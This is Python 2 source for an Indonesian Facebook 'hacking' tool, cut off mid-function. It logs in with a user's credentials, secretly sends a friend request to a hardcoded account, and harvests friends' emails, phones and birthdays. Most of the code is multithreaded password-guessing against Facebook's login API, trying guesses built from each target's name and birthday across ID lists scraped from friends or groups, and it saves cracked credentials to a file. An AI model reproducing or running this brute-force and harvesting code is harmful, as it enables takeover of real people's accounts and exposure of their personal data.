logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mEdition-2.3\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m Mr.KenFlu \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mFACEBOOK \x1b[1;91m: \x1b[1;92m \x1b[92m? \x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mWa \x1b[1;91m: \x1b[1;92\x1b[92m085325260497\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://www.facebook.com/yoga.wira.188')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['sayang'] + 'sayang'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['doraemon'] + 'doraemon'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
